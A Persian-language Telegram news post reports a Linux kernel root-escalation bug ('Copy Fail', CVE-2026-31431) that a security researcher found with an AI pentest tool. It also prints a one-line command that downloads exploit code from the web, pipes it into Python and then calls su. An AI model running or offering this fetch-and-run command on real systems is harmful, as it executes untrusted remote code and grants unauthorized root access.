TGViewer
gooyban🦆 gooyban🦆 @gooyban · 10.5K subscribers
Post #647 6.91K

Forwarded from TechTube 𝕏 تک توب

محقق شرکت امنیتی Theori با کمک پلتفرم تست نفوذ با هوش مصنوعی Xint موفق شده حفره امنیتی خطرناکی در هسته لینوکس رو کشف کنه که به هر فایل اجرایی امکان گرفتن دسترسی روت روی تقریبا هر توزیع لینوکسی رو فراهم میکنه!

این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!

این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال 2017 تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.

برای استفاده از اون فقط کافیه یک فایل 732 بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیاده سازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
curl https://copy.fail/exp | python3 && su


در حال حاضر این باگ در اپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این اپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.

🔎 xint

📍 @TechTube
  • 👍 23
  • ❤ 8
  • 🤯 8
  • 🔥 7
More from @gooyban
  1. Oct 5, 2026🛜 استفاده از چند اینترنت همزمان روی OpenWrt و Load Balance در ویدئوی پیشین که پیش‌نیاز ای…
  2. Sep 23, 2026Post #726
  3. Sep 23, 2026Post #725
  4. Sep 21, 2026ربات GitHub Lens ساخته شد. 🎉 یه ربات کاربردی برای پیدا کردن، بررسی و استفاده راحت‌تر از پ…
  5. Sep 20, 2026Post #723
  6. Sep 19, 2026خب اومدم یک پست شبانه بذارم و برم تا چند روز دیگه که با یک محتوای خوب برگردم :3 براتون سوا…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →